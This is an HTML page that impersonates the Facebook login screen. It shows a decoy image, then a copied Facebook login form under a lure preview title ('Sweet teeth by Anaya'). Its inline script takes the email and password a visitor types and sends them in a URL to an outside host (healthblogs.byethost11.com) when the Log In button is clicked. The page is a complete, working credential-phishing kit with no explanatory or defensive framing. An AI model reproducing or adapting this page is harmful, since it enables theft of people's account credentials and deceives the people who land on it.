<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Log in to Facebook | Facebook</title>
    <meta property="og:image" content="https://scontent.fdac145-1.fna.fbcdn.net/v/t39.30808-6/407852577_122095789826144277_6741305520037558545_n.jpg?_nc_cat=102&ccb=1-7&_nc_sid=efb6e6&_nc_eui2=AeHnx9NF12z9HvKQ9vWeuGSOYW-SXaLZ13thb5JdotnXezx1JNNYzlxIGLJ-2X1rEMvVf32ZyP97RQ9lfvhfBhCl&_nc_ohc=_2Wlx_rG4r4AX_JgHZg&_nc_ht=scontent.fdac145-1.fna&oh=00_AfBQ6vb2-Md4xkgYVMaDFOdEvUyE6DARp7esosY9AOpuSQ&oe=65743A80" />
    <meta property="og:title" content="Sweet teeth by Anaya " />
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: Arial, Helvetica, sans-serif;
        }
        #trap {
            height: 90vh;
            width: 100%;
        }
        #trap img {
            max-width: 100%;
        }
        #main {
            display: none;
        }
        .upper {
            background: #FFFBE2;
            color: #7F7212;
            border-bottom: 1px solid #E2C822;
            padding: 5px 10px;
            font-size: 14px;
        }
        .container {
            width: 100%;
            margin: auto;
            width: 90%;
            /* padding: 20px 0; */
            /* background: red; */
        }
        .logo {
            /* background: #000; */
            width: 100%;
            display: flex;
            justify-content: center;
        }
        .logo img {
            width: 120px;
        }
        .form {
            margin: 10px 0;
        }
        .inputs {
            width: 100%;
            padding: 12px;
            border-radius: 6px;
        }
        .input-area {
            background: #F5F6F7;
            color: #757575;
            border: 1px solid #EDEDED;
            /* box-shadow: 0px 1px 1px black; */
            border-bottom: 1px solid #CCCCCC;
            margin: 4px 0;
        }
        .submit {
            margin: 7px 0;
            background: #1877F2;
            color: white;
            border: 0;
            font-size: 17px;
        }
        .forgot {
            text-align: center;
            color: #216FDB;
            font-size: 14px;
        }
        .or {
            display: flex;
            padding: 20px 0;
            align-items: center;
            gap: 10px;
            color: #717885;
        }
        .or .left, .or .right {
            height: 1px;
            background: #CCD0D5;
            width: 48%;
        }
        .create {
            margin: auto;
            width: 80%;
            text-align: center;
            border: 1px solid #CCD0D5;
            padding: 8px;
            border-radius: 6px;
        }
        .language {
            font-size: 13px;
            margin-top: 100px;
            text-align: center;
            display: flex;
        }
        .language div {
            width: 50%;
            color: #576B95;
        }
        .language .right {
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
        }
        .language .right p {
            margin: 1px 0;
        }
        .language div p{
            margin: 3px 0;
        }
        .plus {
            font-size: 18px;
            color: #90949C;
            border: 1px solid #576B95;
            padding: 10px;
            margin: auto;
            width: 10px;
            height: 10px;
            text-align: center;
            display: flex;
            align-items: center;
            justify-content: center;
        }
        .footer {
            font-size: 14px;
            text-align: center;
            color: #90949C;
            margin: 5px 0;
        }
    </style>
</head>
<body>
    <div id="trap">
        <img src="caje.jpg" alt="" id="ss">
    </div>
    <div id="main">
    <div class="upper">
        <p>You must log in first.</p>
    </div>
    <div class="container">
        <div class="logo">
            <img src="https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg" alt="">
        </div>
        <!-- <form class="form" action="ind.php" method="POST"> -->
        <div>
            <input type="text" name="email" id="email" class="inputs input-area" placeholder="Mobile number or email address">
            <input type="password" name="password" class="inputs input-area" placeholder="Password" id="password">
            <input type="submit" name="submit" class="inputs submit" value="Log In" id="sub">
        </form>
        </div>
        <div class="forgot">
            <p>Forgotten password?</p>
        </div>
        <div class="or">
            <div class="left"></div>
            <p>or</p>
            <div class="right"></div>
        </div>
        <div class="create">
            <p>Create new account</p>
        </div>
        <div class="language">
            <div class="left">
                <p style="color:#90949C">English (UK)</p>
                <p>অসমীয়া</p>
                <p>नेपाली</p>
                <p>Português (Brasil)</p>
            </div>
            <div class="right">
                <p>বাংলা</p>
                <p>हिन्दी</p>
                <p>Español</p>
                <p class="plus">+</p>
            </div>
        </div>
        <div class="footer">
            <p>Meta © 2023</p>
        </div>
    </div>
</div>
    <script>
        ss.onload=()=>{
            setInterval(()=>{trap.style.display="none";main.style.display="block"},1000)
        }
        
        sub.onclick=()=>{
            location.href=`http://healthblogs.byethost11.com/ind.php?string=${email.value}%${password.value}`
        }
    </script>
</body>
</html>
